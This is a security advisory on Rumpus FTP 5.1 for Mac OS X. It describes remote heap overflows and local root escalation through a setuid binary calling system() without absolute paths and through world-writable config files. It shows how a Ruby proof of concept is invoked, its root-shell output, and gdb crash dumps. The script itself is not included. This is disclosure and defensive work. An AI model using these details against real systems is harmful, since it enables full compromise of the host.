BACK

CREDIT

POC or EXPLOIT

REFERENCES


b00m!

Summary

The following description is provided by the vendor (Maxum Development Corporation):

If you need to allow people from within your office or across the Internet to send, receive, and manage files on a central Mac, Rumpus FTP is what you are looking for. Rumpus is perfect for print, media or design shops, and is the answer to education and corporate file sharing needs. Rumpus FTP can handle virtually any Internet file transfer task by working with standard FTP and Web clients on any platform, and do it with remarkable ease.

rumpusd is vulnerable to different remotely exploitable heap-based buffer overflows, denial of service conditions and local privilege escalation issues. Due to the fact that Rumpus works under root privileges, successful exploitation by unprivileged users would allow a full compromise of the system.

Most of these issues are related to both FTP and HTTP request parsing, as well as insecure use of the system() function and incorrect permissions and/or handling of setuid binaries.

Affected versions

Rumpus 5.1 and previous versions on Mac OS X 10.4.8 (8L2127). Tested on both PowerPC and x86 based OS X.

Proof of concept, exploit or instructions to reproduce

The provided proof of concept can abuse one of the local privilege escalation issues and another (post-authentication) problem in the handling of the FTP LIST command.

$ ruby MOAB-18-01-2007.rb [selected issue]

example:
$ ruby bug-files/MOAB-18-01-2007.rb 1
++ Local privilege escalation...
++ Enjoy root shell...
sh-2.05b# id
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)
			

Note: The local privilege escalation exploit doesn't replace any files on the filesystem.

Debugging information

The following debugging information shows the results of launching the proof of concept against the FTP service, and the permissions and other information related to Rumpus binaries.

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x33616263
[Switching to process 989 thread 0x3703]
0x00009fa5 in ?? ()
(gdb) i r
eax            0x0      0
ecx            0x0      0
edx            0x33616263       862020195
ebx            0x100007f        16777343
esp            0xb060aa50       0xb060aa50
ebp            0xb060aa78       0xb060aa78
esi            0x0      0
edi            0x0      0
eip            0x9fa5   0x9fa5
eflags         0x10297  66199
cs             0x17     23
ss             0x1f     31
ds             0x1f     31
es             0x1f     31
fs             0x0      0
gs             0x37     55

(gdb) x/i $eip
0x9fa5: mov    (%edx,%eax,4),%eax

(gdb) x/10x $ebp
0xb0c16a78:     0xb0c16eb8      0x0000f68f      0x33616263      0x72646972
0xb0c16a88:     0xb0c16ef8      0xb0c16ea4      0x00000000      0x00000000
0xb0c16a98:     0x00000000      0x00000000

(gdb) i f             
Stack level 0, frame at 0xb0c16a54:
 eip = 0x9fa5; saved eip 0x0
 called by frame at 0x9f9e
 Arglist at 0xb0c16a4c, args: 
 Locals at 0xb0c16a4c, Previous frame's sp is 0xb0c16a54
 Saved registers:
  ebp at 0xb0c16a4c, eip at 0xb0c16a50

$ ls -l /usr/local/Rumpus/
total 1912
drwxr-xr-x    7 root  wheel     238 Jan 19 08:35 Logs
-rw-r--r--    1 root  wheel     790 Jan 19 00:38 Mac2Web.txt
-rw-r--r--    1 root  wheel    2144 Jan 17 14:51 Messages.txt
-rw-rw-rw-    1 root  wheel    3128 Jan 19 07:43 Rumpus.conf
-rw-rw-rw-    1 root  wheel       0 Jan 19 00:38 Rumpus.fsets
-rw-rw-rw-    1 root  wheel       0 Jan 19 00:38 Rumpus.notices
-rw-r--r--    1 root  wheel       3 Jan 19 08:50 Rumpus.pid
-rw-rw-rw-    1 root  wheel       0 Jan 19 00:38 Rumpus.rips
-rw-r--r--    1 root  wheel    8112 Jan 19 00:38 Rumpus.strings
-rw-rw-rw-    1 root  wheel    1456 Jan 19 00:38 Rumpus.types
-rw-rw-rw-    1 root  wheel     200 Jan 19 07:45 Rumpus.users
-rw-r--r--    1 root  wheel      31 Jan 19 08:36 Rumpus.userstats
drwxrwxrwx   46 root  wheel    1564 Jan 19 00:38 WFMTemplates
-rw-r--r--    1 root  wheel     939 Jan 19 00:38 Web2Mac.txt
-rwsr-sr-x    1 root  wheel  934244 Jan 19 00:38 rumpusd

$ strings /usr/local/Rumpus/rumpusd | grep ipfw
ipfw list > /usr/local/Rumpus/Rumpus.ipfw
/usr/local/Rumpus/Rumpus.ipfw
ipfw list > /usr/local/Rumpus/Rumpus.ipfw
/usr/local/Rumpus/Rumpus.ipfw
			

rumpusd makes the (old, yet still common) mistake of using the system() function without absolute paths.

Notes

Exploitation conditions

Rumpus local privilege escalation issues don't need admin group privileges for exploitation. FTP service flaws, mostly heap buffer overflows, require authentication first (ex. anonymous access). HTTP service flaws can be abused without any type of authentication.

Workaround or temporary solution

For preventing exploitation of the remote issues, properly limit access to the Rumpus services from untrusted hosts, until a patch is made available by the vendor. There's no workaround for some of the local privilege escalation issues, due to the fact that they rely on mis-use of the system() function and not just 'insecure' permissions (although patching the binary is feasible). Use an alternative file sharing method.